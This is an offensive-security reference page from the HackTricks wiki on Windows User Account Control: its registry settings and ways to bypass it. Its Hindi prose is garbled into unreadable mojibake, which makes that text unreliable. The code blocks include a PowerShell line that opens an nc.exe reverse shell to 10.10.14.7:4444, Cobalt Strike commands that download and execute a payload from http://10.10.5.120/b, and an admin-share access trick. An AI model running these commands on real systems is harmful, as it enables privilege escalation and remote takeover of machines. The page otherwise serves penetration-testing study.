hacktricks/windows-hardening/windows-security-controls/uac-user-account-control.md

30 KiB

UAC - User Account Control

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Use Trickest to easily build and automate workflows powered by the world's most advanced community tools.
Get Access Today:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

UAC

User Account Control (UAC) рдПрдХ рд╡рд┐рд╢реЗрд╖рддрд╛ рд╣реИ рдЬреЛ рдЙрдЪреНрдЪ рдЧрддрд┐рд╡рд┐рдзрд┐рдпреЛрдВ рдХреЗ рд▓рд┐рдП рд╕рд╣рдорддрд┐ рд╕рдВрдХреЗрдд рд╕рдХреНрд╖рдо рдХрд░рддреА рд╣реИред рдЕрдиреБрдкреНрд░рдпреЛрдЧреЛрдВ рдХреЗ рд╡рд┐рднрд┐рдиреНрди integrity рд╕реНрддрд░ рд╣реЛрддреЗ рд╣реИрдВ, рдФрд░ рдПрдХ рдЙрдЪреНрдЪ рд╕реНрддрд░ рд╡рд╛рд▓рд╛ рдХрд╛рд░реНрдпрдХреНрд░рдо рдЙрди рдХрд╛рд░реНрдпреЛрдВ рдХреЛ рдХрд░рдиреЗ рдореЗрдВ рд╕рдХреНрд╖рдо рд╣реЛрддрд╛ рд╣реИ рдЬреЛ рд╕рдВрднрд╡рддрдГ рд╕рд┐рд╕реНрдЯрдо рдХреЛ рдЦрддрд░реЗ рдореЗрдВ рдбрд╛рд▓ рд╕рдХрддреЗ рд╣реИрдВред рдЬрдм UAC рд╕рдХреНрд╖рдо рд╣реЛрддрд╛ рд╣реИ, рдЕрдиреБрдкреНрд░рдпреЛрдЧ рдФрд░ рдХрд╛рд░реНрдп рд╣рдореЗрд╢рд╛ рдЧреИрд░-рдкреНрд░рд╢рд╛рд╕рдХ рдЦрд╛рддреЗ рдХреЗ рд╕реБрд░рдХреНрд╖рд╛ рд╕рдВрджрд░реНрдн рдореЗрдВ рдЪрд▓рддреЗ рд╣реИрдВ рдЬрдм рддрдХ рдХрд┐ рдПрдХ рдкреНрд░рд╢рд╛рд╕рдХ рд╕реНрдкрд╖реНрдЯ рд░реВрдк рд╕реЗ рдЗрди рдЕрдиреБрдкреНрд░рдпреЛрдЧреЛрдВ/рдХрд╛рд░реНрдп рдХреЛ рд╕рд┐рд╕реНрдЯрдо рдкрд░ рдкреНрд░рд╢рд╛рд╕рдХ рд╕реНрддрд░ рдХреА рдкрд╣реБрдВрдЪ рджреЗрдиреЗ рдХреЗ рд▓рд┐рдП рдЕрдзрд┐рдХреГрдд рди рдХрд░реЗред рдпрд╣ рдПрдХ рд╕реБрд╡рд┐рдзрд╛ рд╣реИ рдЬреЛ рдкреНрд░рд╢рд╛рд╕рдХреЛрдВ рдХреЛ рдЕрдирдкреЗрдХреНрд╖рд┐рдд рдкрд░рд┐рд╡рд░реНрддрдиреЛрдВ рд╕реЗ рдмрдЪрд╛рддреА рд╣реИ рд▓реЗрдХрд┐рди рдЗрд╕реЗ рд╕реБрд░рдХреНрд╖рд╛ рд╕реАрдорд╛ рдирд╣реАрдВ рдорд╛рдирд╛ рдЬрд╛рддрд╛ рд╣реИред

рдЕрдзрд┐рдХрд╛рд░рд┐рддрд╛ рд╕реНрддрд░реЛрдВ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЕрдзрд┐рдХ рдЬрд╛рдирдХрд╛рд░реА рдХреЗ рд▓рд┐рдП:

{% content-ref url="../windows-local-privilege-escalation/integrity-levels.md" %} integrity-levels.md {% endcontent-ref %}

рдЬрдм UAC рд▓рд╛рдЧреВ рд╣реЛрддрд╛ рд╣реИ, рдПрдХ рдкреНрд░рд╢рд╛рд╕рдХ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЛ 2 рдЯреЛрдХрди рджрд┐рдП рдЬрд╛рддреЗ рд╣реИрдВ: рдПрдХ рдорд╛рдирдХ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреБрдВрдЬреА, рдирд┐рдпрдорд┐рдд рд╕реНрддрд░ рдХреЗ рд░реВрдк рдореЗрдВ рдирд┐рдпрдорд┐рдд рдХреНрд░рд┐рдпрд╛рдПрдБ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рдФрд░ рдПрдХ рдкреНрд░рд╢рд╛рд╕рдХ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдХреЗ рд╕рд╛рдеред

рдпрд╣ рдкреГрд╖реНрда UAC рдХреЗ рдХрд╛рдо рдХрд░рдиреЗ рдХреЗ рддрд░реАрдХреЗ рдкрд░ рдЧрд╣рд░рд╛рдИ рд╕реЗ рдЪрд░реНрдЪрд╛ рдХрд░рддрд╛ рд╣реИ рдФрд░ рд▓реЙрдЧрд┐рди рдкреНрд░рдХреНрд░рд┐рдпрд╛, рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЕрдиреБрднрд╡, рдФрд░ UAC рдЖрд░реНрдХрд┐рдЯреЗрдХреНрдЪрд░ рдХреЛ рд╢рд╛рдорд┐рд▓ рдХрд░рддрд╛ рд╣реИред рдкреНрд░рд╢рд╛рд╕рдХ рд╕реБрд░рдХреНрд╖рд╛ рдиреАрддрд┐рдпреЛрдВ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдпрд╣ рдХреЙрдиреНрдлрд╝рд┐рдЧрд░ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдХрд┐ UAC рдЙрдирдХреЗ рд╕рдВрдЧрдарди рдХреЗ рд▓рд┐рдП рд╕реНрдерд╛рдиреАрдп рд╕реНрддрд░ рдкрд░ рдХреИрд╕реЗ рдХрд╛рдо рдХрд░рддрд╛ рд╣реИ (secpol.msc рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ), рдпрд╛ рдЗрд╕реЗ Active Directory рдбреЛрдореЗрди рд╡рд╛рддрд╛рд╡рд░рдг рдореЗрдВ рд╕рдореВрд╣ рдиреАрддрд┐ рд╡рд╕реНрддреБрдУрдВ (GPO) рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдХреЙрдиреНрдлрд╝рд┐рдЧрд░ рдФрд░ рдзрдХреЗрд▓ рд╕рдХрддреЗ рд╣реИрдВред рд╡рд┐рднрд┐рдиреНрди рд╕реЗрдЯрд┐рдВрдЧреНрд╕ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рд╡рд┐рд╕реНрддрд╛рд░ рд╕реЗ рдЪрд░реНрдЪрд╛ рдХреА рдЧрдИ рд╣реИ рдпрд╣рд╛рдБред UAC рдХреЗ рд▓рд┐рдП 10 рд╕рдореВрд╣ рдиреАрддрд┐ рд╕реЗрдЯрд┐рдВрдЧреНрд╕ рд╕реЗрдЯ рдХреА рдЬрд╛ рд╕рдХрддреА рд╣реИрдВред рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рддрд╛рд▓рд┐рдХрд╛ рдЕрддрд┐рд░рд┐рдХреНрдд рд╡рд┐рд╡рд░рдг рдкреНрд░рджрд╛рди рдХрд░рддреА рд╣реИ:

Group Policy Setting Registry Key Default Setting
User Account Control: Admin Approval Mode for the built-in Administrator account FilterAdministratorToken Disabled
User Account Control: Allow UIAccess applications to prompt for elevation without using the secure desktop EnableUIADesktopToggle Disabled
User Account Control: Behavior of the elevation prompt for administrators in Admin Approval Mode ConsentPromptBehaviorAdmin Prompt for consent for non-Windows binaries
User Account Control: Behavior of the elevation prompt for standard users ConsentPromptBehaviorUser Prompt for credentials on the secure desktop
User Account Control: Detect application installations and prompt for elevation EnableInstallerDetection Enabled (default for home) Disabled (default for enterprise)
User Account Control: Only elevate executables that are signed and validated ValidateAdminCodeSignatures Disabled
User Account Control: Only elevate UIAccess applications that are installed in secure locations EnableSecureUIAPaths Enabled
User Account Control: Run all administrators in Admin Approval Mode EnableLUA Enabled
User Account Control: Switch to the secure desktop when prompting for elevation PromptOnSecureDesktop Enabled
User Account Control: Virtualize file and registry write failures to per-user locations EnableVirtualization Enabled

UAC Bypass Theory

рдХреБрдЫ рдХрд╛рд░реНрдпрдХреНрд░рдо рд╕реНрд╡рдЪрд╛рд▓рд┐рдд рд░реВрдк рд╕реЗ рдЙрдЪреНрдЪ рд╕реНрддрд░ рдкрд░ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рд╕рдореВрд╣ рд╕реЗ рд╕рдВрдмрдВрдзрд┐рдд рд╣реЛрдиреЗ рдкрд░ рд╕реНрд╡рдЪрд╛рд▓рд┐рдд рд░реВрдк рд╕реЗ рдЙрдЪреНрдЪреАрдХреГрдд рд╣реЛрддреЗ рд╣реИрдВред рдЗрди рдмрд╛рдЗрдирд░реА рдореЗрдВ рдЙрдирдХреЗ Manifests рдХреЗ рдЕрдВрджрд░ autoElevate рд╡рд┐рдХрд▓реНрдк рдХрд╛ рдорд╛рди True рд╣реЛрддрд╛ рд╣реИред рдмрд╛рдЗрдирд░реА рдХреЛ Microsoft рджреНрд╡рд╛рд░рд╛ рд╣рд╕реНрддрд╛рдХреНрд╖рд░рд┐рдд рд╣реЛрдирд╛ рдЪрд╛рд╣рд┐рдПред

рдлрд┐рд░, UAC рдХреЛ рдмрд╛рдпрдкрд╛рд╕ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП (рдЙрдЪреНрдЪ integrity рд╕реНрддрд░ рд╕реЗ рдЙрдЪреНрдЪ рдкрд░) рдХреБрдЫ рд╣рдорд▓рд╛рд╡рд░ рдЗрд╕ рдкреНрд░рдХрд╛рд░ рдХреА рдмрд╛рдЗрдирд░реА рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реИрдВ рддрд╛рдХрд┐ рд╡реЗ рдордирдорд╛рдиреЗ рдХреЛрдб рдХреЛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░ рд╕рдХреЗрдВ рдХреНрдпреЛрдВрдХрд┐ рдЗрд╕реЗ рдЙрдЪреНрдЪ рд╕реНрддрд░ рдХреА рд╕реБрд░рдХреНрд╖рд╛ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рд╕реЗ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд┐рдпрд╛ рдЬрд╛рдПрдЧрд╛ред

рдЖрдк sigcheck.exe рдЙрдкрдХрд░рдг рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдПрдХ рдмрд╛рдЗрдирд░реА рдХрд╛ Manifest рдЪреЗрдХ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред рдФрд░ рдЖрдк Process Explorer рдпрд╛ Process Monitor (Sysinternals рдХреЗ) рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдкреНрд░рдХреНрд░рд┐рдпрд╛рдУрдВ рдХреЗ integrity рд╕реНрддрд░ рдХреЛ рджреЗрдЦ рд╕рдХрддреЗ рд╣реИрдВред

Check UAC

UAC рд╕рдХреНрд╖рдо рд╣реИ рдпрд╛ рдирд╣реАрдВ, рдЗрд╕рдХреА рдкреБрд╖реНрдЯрд┐ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХрд░реЗрдВ:

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
EnableLUA    REG_DWORD    0x1

рдпрджрд┐ рдпрд╣ 1 рд╣реИ рддреЛ UAC рд╕рдХреНрд░рд┐рдп рд╣реИ, рдпрджрд┐ рдпрд╣ 0 рд╣реИ рдпрд╛ рдпрд╣ рдореМрдЬреВрдж рдирд╣реАрдВ рд╣реИ, рддреЛ UAC рдирд┐рд╖реНрдХреНрд░рд┐рдп рд╣реИред

рдлрд┐рд░, рдХреМрди рд╕рд╛ рд╕реНрддрд░ рдХреЙрдиреНрдлрд╝рд┐рдЧрд░ рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ, рдЗрд╕рдХреА рдЬрд╛рдВрдЪ рдХрд░реЗрдВ:

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
ConsentPromptBehaviorAdmin    REG_DWORD    0x5
  • рдпрджрд┐ 0 рд╣реИ рддреЛ, UAC рд╕рдВрдХреЗрдд рдирд╣реАрдВ рджреЗрдЧрд╛ (рдЬреИрд╕реЗ рдЕрдХреНрд╖рдо)
  • рдпрджрд┐ 1 рд╣реИ рддреЛ рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рд╕реЗ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдо рдФрд░ рдкрд╛рд╕рд╡рд░реНрдб рдкреВрдЫрд╛ рдЬрд╛рдПрдЧрд╛ рдЙрдЪреНрдЪ рдЕрдзрд┐рдХрд╛рд░реЛрдВ рдХреЗ рд╕рд╛рде рдмрд╛рдЗрдирд░реА рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП (рд╕реБрд░рдХреНрд╖рд┐рдд рдбреЗрд╕реНрдХрдЯреЙрдк рдкрд░)
  • рдпрджрд┐ 2 рд╣реИ (рд╣рдореЗрд╢рд╛ рдореБрдЭреЗ рд╕реВрдЪрд┐рдд рдХрд░реЗрдВ) UAC рд╣рдореЗрд╢рд╛ рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рд╕реЗ рдкреБрд╖реНрдЯрд┐ рдорд╛рдВрдЧреЗрдЧрд╛ рдЬрдм рд╡рд╣ рдЙрдЪреНрдЪ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХреЗ рд╕рд╛рде рдХреБрдЫ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдиреЗ рдХреА рдХреЛрд╢рд┐рд╢ рдХрд░реЗрдЧрд╛ (рд╕реБрд░рдХреНрд╖рд┐рдд рдбреЗрд╕реНрдХрдЯреЙрдк рдкрд░)
  • рдпрджрд┐ 3 рд╣реИ рддреЛ 1 рдХреА рддрд░рд╣ рд▓реЗрдХрд┐рди рд╕реБрд░рдХреНрд╖рд┐рдд рдбреЗрд╕реНрдХрдЯреЙрдк рдкрд░ рдЖрд╡рд╢реНрдпрдХ рдирд╣реАрдВ
  • рдпрджрд┐ 4 рд╣реИ рддреЛ 2 рдХреА рддрд░рд╣ рд▓реЗрдХрд┐рди рд╕реБрд░рдХреНрд╖рд┐рдд рдбреЗрд╕реНрдХрдЯреЙрдк рдкрд░ рдЖрд╡рд╢реНрдпрдХ рдирд╣реАрдВ
  • рдпрджрд┐ 5 рд╣реИ (рдбрд┐рдлрд╝реЙрд▓реНрдЯ) рддреЛ рдпрд╣ рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рд╕реЗ рдкреБрд╖реНрдЯрд┐ рдорд╛рдВрдЧреЗрдЧрд╛ рдХрд┐ рдЙрдЪреНрдЪ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХреЗ рд╕рд╛рде рдЧреИрд░-рд╡рд┐рдВрдбреЛрдЬ рдмрд╛рдЗрдирд░реА рдЪрд▓рд╛рдиреЗ рдХреЗ рд▓рд┐рдП

рдлрд┐рд░, рдЖрдкрдХреЛ LocalAccountTokenFilterPolicy рдХреЗ рдорд╛рди рдкрд░ рдзреНрдпрд╛рди рджреЗрдирд╛ рд╣реЛрдЧрд╛
рдпрджрд┐ рдорд╛рди 0 рд╣реИ, рддреЛ рдХреЗрд╡рд▓ RID 500 рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ (рдмрд┐рд▓реНрдЯ-рдЗрди рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ) UAC рдХреЗ рдмрд┐рдирд╛ рдкреНрд░рд╢рд╛рд╕рдирд┐рдХ рдХрд╛рд░реНрдп рдХрд░ рд╕рдХрддрд╛ рд╣реИ, рдФрд░ рдпрджрд┐ рдЗрд╕рдХрд╛ 1 рд╣реИ, рддреЛ "Administrators" рд╕рдореВрд╣ рдХреЗ рд╕рднреА рдЦрд╛рддреЗ рдРрд╕рд╛ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред

рдФрд░, рдЕрдВрдд рдореЗрдВ FilterAdministratorToken рдХреБрдВрдЬреА рдХреЗ рдорд╛рди рдкрд░ рдзреНрдпрд╛рди рджреЗрдВ
рдпрджрд┐ 0 (рдбрд┐рдлрд╝реЙрд▓реНрдЯ) рд╣реИ, рддреЛ рдмрд┐рд▓реНрдЯ-рдЗрди рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдЦрд╛рддрд╛ рджреВрд░рд╕реНрде рдкреНрд░рд╢рд╛рд╕рдирд┐рдХ рдХрд╛рд░реНрдп рдХрд░ рд╕рдХрддрд╛ рд╣реИ рдФрд░ рдпрджрд┐ 1 рд╣реИ рддреЛ рдмрд┐рд▓реНрдЯ-рдЗрди рдЦрд╛рддрд╛ рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рджреВрд░рд╕реНрде рдкреНрд░рд╢рд╛рд╕рдирд┐рдХ рдХрд╛рд░реНрдп рдирд╣реАрдВ рдХрд░ рд╕рдХрддрд╛, рдЬрдм рддрдХ LocalAccountTokenFilterPolicy рдХреЛ 1 рдкрд░ рд╕реЗрдЯ рдирд╣реАрдВ рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИред

рд╕рд╛рд░рд╛рдВрд╢

  • рдпрджрд┐ EnableLUA=0 рдпрд╛ рдореМрдЬреВрдж рдирд╣реАрдВ рд╣реИ, рдХрд┐рд╕реА рдХреЗ рд▓рд┐рдП рднреА UAC рдирд╣реАрдВ
  • рдпрджрд┐ EnableLua=1 рдФрд░ LocalAccountTokenFilterPolicy=1, рдХрд┐рд╕реА рдХреЗ рд▓рд┐рдП рднреА UAC рдирд╣реАрдВ
  • рдпрджрд┐ EnableLua=1 рдФрд░ LocalAccountTokenFilterPolicy=0 рдФрд░ FilterAdministratorToken=0, RID 500 (рдмрд┐рд▓реНрдЯ-рдЗрди рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ) рдХреЗ рд▓рд┐рдП рдХреЛрдИ UAC рдирд╣реАрдВ
  • рдпрджрд┐ EnableLua=1 рдФрд░ LocalAccountTokenFilterPolicy=0 рдФрд░ FilterAdministratorToken=1, рд╕рднреА рдХреЗ рд▓рд┐рдП UAC

рдпрд╣ рд╕рднреА рдЬрд╛рдирдХрд╛рд░реА metasploit рдореЙрдбреНрдпреВрд▓ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдПрдХрддреНрд░ рдХреА рдЬрд╛ рд╕рдХрддреА рд╣реИ: post/windows/gather/win_privs

рдЖрдк рдЕрдкрдиреЗ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рд╕рдореВрд╣реЛрдВ рдХреА рднреА рдЬрд╛рдВрдЪ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рдЕрдЦрдВрдбрддрд╛ рд╕реНрддрд░ рдкреНрд░рд╛рдкреНрдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:

net user %username%
whoami /groups | findstr Level

UAC рдмрд╛рдпрдкрд╛рд╕

{% hint style="info" %} рдзреНрдпрд╛рди рджреЗрдВ рдХрд┐ рдпрджрд┐ рдЖрдкрдХреЗ рдкрд╛рд╕ рдкреАрдбрд╝рд┐рдд рддрдХ рдЧреНрд░рд╛рдлрд┐рдХрд▓ рдкрд╣реБрдВрдЪ рд╣реИ, рддреЛ UAC рдмрд╛рдпрдкрд╛рд╕ рд╕реАрдзрд╛ рд╣реИ рдХреНрдпреЛрдВрдХрд┐ рдЖрдк рдмрд╕ "рд╣рд╛рдБ" рдкрд░ рдХреНрд▓рд┐рдХ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдЬрдм UAS рдкреНрд░реЙрдореНрдкреНрдЯ рдкреНрд░рдХрдЯ рд╣реЛрддрд╛ рд╣реИ {% endhint %}

UAC рдмрд╛рдпрдкрд╛рд╕ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рд╕реНрдерд┐рддрд┐ рдореЗрдВ рд╣реЛрддреА рд╣реИ: UAC рд╕рдХреНрд░рд┐рдп рд╣реИ, рдЖрдкрдХреА рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдПрдХ рдордзреНрдпрдо рдЕрдЦрдВрдбрддрд╛ рд╕рдВрджрд░реНрдн рдореЗрдВ рдЪрд▓ рд░рд╣реА рд╣реИ, рдФрд░ рдЖрдкрдХрд╛ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдкреНрд░рд╢рд╛рд╕рдХреЛрдВ рд╕рдореВрд╣ рдореЗрдВ рд╣реИред

рдпрд╣ рдЙрд▓реНрд▓реЗрдЦ рдХрд░рдирд╛ рдорд╣рддреНрд╡рдкреВрд░реНрдг рд╣реИ рдХрд┐ UAC рдХреЛ рдЙрдЪреНрдЪрддрдо рд╕реБрд░рдХреНрд╖рд╛ рд╕реНрддрд░ (рд╣рдореЗрд╢рд╛) рдореЗрдВ рдмрд╛рдпрдкрд╛рд╕ рдХрд░рдирд╛ рдмрд╣реБрдд рдХрдард┐рди рд╣реИ, рдмрдЬрд╛рдп рдЗрд╕рдХреЗ рдХрд┐ рдпрд╣ рдХрд┐рд╕реА рдЕрдиреНрдп рд╕реНрддрд░ (рдбрд┐рдлрд╝реЙрд▓реНрдЯ) рдореЗрдВ рд╣реЛред

UAC рдЕрдХреНрд╖рдо

рдпрджрд┐ UAC рдкрд╣рд▓реЗ рд╕реЗ рд╣реА рдЕрдХреНрд╖рдо рд╣реИ (ConsentPromptBehaviorAdmin 0 рд╣реИ) рддреЛ рдЖрдк рдкреНрд░рд╢рд╛рд╕рдХ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХреЗ рд╕рд╛рде рдПрдХ рд░рд┐рд╡рд░реНрд╕ рд╢реЗрд▓ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ (рдЙрдЪреНрдЪ рдЕрдЦрдВрдбрддрд╛ рд╕реНрддрд░) рдХреБрдЫ рдЗрд╕ рддрд░рд╣:

#Put your reverse shell instead of "calc.exe"
Start-Process powershell -Verb runAs "calc.exe"
Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10.14.7 4444"

UAC рдмрд╛рдпрдкрд╛рд╕ рдЯреЛрдХрди рдбреБрдкреНрд▓реАрдХреЗрд╢рди рдХреЗ рд╕рд╛рде

рдмрд╣реБрдд рдмреБрдирд┐рдпрд╛рджреА UAC "рдмрд╛рдпрдкрд╛рд╕" (рдкреВрд░реНрдг рдлрд╝рд╛рдЗрд▓ рдкреНрд░рдгрд╛рд▓реА рдкрд╣реБрдБрдЪ)

рдпрджрд┐ рдЖрдкрдХреЗ рдкрд╛рд╕ рдПрдХ рд╢реЗрд▓ рд╣реИ рдЬрд┐рд╕рдореЗрдВ рдПрдХ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рд╣реИ рдЬреЛ Administrators рд╕рдореВрд╣ рдХреЗ рдЕрдВрджрд░ рд╣реИ, рддреЛ рдЖрдк C$ рд╕рд╛рдЭрд╛ рдХреЛ SMB (рдлрд╝рд╛рдЗрд▓ рдкреНрд░рдгрд╛рд▓реА) рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдПрдХ рдирдП рдбрд┐рд╕реНрдХ рдореЗрдВ рд╕реНрдерд╛рдиреАрдп рд░реВрдк рд╕реЗ рдорд╛рдЙрдВрдЯ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рдЖрдкрдХреЛ рдлрд╝рд╛рдЗрд▓ рдкреНрд░рдгрд╛рд▓реА рдХреЗ рдЕрдВрджрд░ рд╕рдм рдХреБрдЫ рддрдХ рдкрд╣реБрдБрдЪ рдкреНрд░рд╛рдкреНрдд рд╣реЛрдЧреА (рдпрд╣рд╛рдБ рддрдХ рдХрд┐ Administrator рдХрд╛ рд╣реЛрдо рдлрд╝реЛрд▓реНрдбрд░)ред

{% hint style="warning" %} рд▓рдЧрддрд╛ рд╣реИ рдХрд┐ рдпрд╣ рдЯреНрд░рд┐рдХ рдЕрдм рдХрд╛рдо рдирд╣реАрдВ рдХрд░ рд░рд╣реА рд╣реИ {% endhint %}

net use Z: \\127.0.0.1\c$
cd C$

#Or you could just access it:
dir \\127.0.0.1\c$\Users\Administrator\Desktop

UAC рдмрд╛рдпрдкрд╛рд╕ рдХреЛрдмрд╛рд▓реНрдЯ рд╕реНрдЯреНрд░рд╛рдЗрдХ рдХреЗ рд╕рд╛рде

рдХреЛрдмрд╛рд▓реНрдЯ рд╕реНрдЯреНрд░рд╛рдЗрдХ рддрдХрдиреАрдХреЗрдВ рдХреЗрд╡рд▓ рддрднреА рдХрд╛рдо рдХрд░реЗрдВрдЧреА рдЬрдм UAC рдХреЛ рдЗрд╕рдХреЗ рдЕрдзрд┐рдХрддрдо рд╕реБрд░рдХреНрд╖рд╛ рд╕реНрддрд░ рдкрд░ рд╕реЗрдЯ рдирд╣реАрдВ рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реЛред

# UAC bypass via token duplication
elevate uac-token-duplication [listener_name]
# UAC bypass via service
elevate svc-exe [listener_name]

# Bypass UAC with Token Duplication
runasadmin uac-token-duplication powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
# Bypass UAC with CMSTPLUA COM interface
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"

Empire рдФрд░ Metasploit рдореЗрдВ UAC рдХреЛ bypass рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХрдИ рдореЙрдбреНрдпреВрд▓ рд╣реИрдВред

KRBUACBypass

рджрд╕реНрддрд╛рд╡реЗрдЬрд╝ рдФрд░ рдЙрдкрдХрд░рдг https://github.com/wh0amitz/KRBUACBypass рдореЗрдВ

UAC bypass exploits

UACME рдЬреЛ рдХрдИ UAC bypass exploits рдХрд╛ рд╕рдВрдХрд▓рди рд╣реИред рдзреНрдпрд╛рди рджреЗрдВ рдХрд┐ рдЖрдкрдХреЛ UACME рдХреЛ рд╡рд┐рдЬрд╝реБрдЕрд▓ рд╕реНрдЯреВрдбрд┐рдпреЛ рдпрд╛ msbuild рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рд╕рдВрдХрд▓рд┐рдд рдХрд░рдирд╛ рд╣реЛрдЧрд╛ред рд╕рдВрдХрд▓рди рдХрдИ рдирд┐рд╖реНрдкрд╛рджрди рдпреЛрдЧреНрдп рдлрд╝рд╛рдЗрд▓реЗрдВ рдмрдирд╛рдПрдЧрд╛ (рдЬреИрд╕реЗ Source\Akagi\outout\x64\Debug\Akagi.exe), рдЖрдкрдХреЛ рдпрд╣ рдЬрд╛рдирдирд╛ рд╣реЛрдЧрд╛ рдХрд┐ рдЖрдкрдХреЛ рдХреМрди рд╕реА рдЪрд╛рд╣рд┐рдПред
рдЖрдкрдХреЛ рд╕рд╛рд╡рдзрд╛рди рд░рд╣рдирд╛ рдЪрд╛рд╣рд┐рдП рдХреНрдпреЛрдВрдХрд┐ рдХреБрдЫ рдмрд╛рдпрдкрд╛рд╕ рдХреБрдЫ рдЕрдиреНрдп рдХрд╛рд░реНрдпрдХреНрд░рдореЛрдВ рдХреЛ рдкреНрд░реЙрдореНрдкреНрдЯ рдХрд░реЗрдВрдЧреЗ рдЬреЛ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЛ рд╕реВрдЪрд┐рдд рдХрд░реЗрдВрдЧреЗ рдХрд┐ рдХреБрдЫ рд╣реЛ рд░рд╣рд╛ рд╣реИред

UACME рдореЗрдВ рдирд┐рд░реНрдорд╛рдг рд╕рдВрд╕реНрдХрд░рдг рд╣реИ рдЬрд┐рд╕рд╕реЗ рдкреНрд░рддреНрдпреЗрдХ рддрдХрдиреАрдХ рдХрд╛рдо рдХрд░рдирд╛ рд╢реБрд░реВ рд╣реБрдИред рдЖрдк рдЕрдкрдиреЗ рд╕рдВрд╕реНрдХрд░рдгреЛрдВ рдХреЛ рдкреНрд░рднрд╛рд╡рд┐рдд рдХрд░рдиреЗ рд╡рд╛рд▓реА рддрдХрдиреАрдХ рдХреЗ рд▓рд┐рдП рдЦреЛрдЬ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:

PS C:\> [environment]::OSVersion.Version

Major  Minor  Build  Revision
-----  -----  -----  --------
10     0      14393  0

Also, using this page you get the Windows release 1607 from the build versions.

More UAC bypass

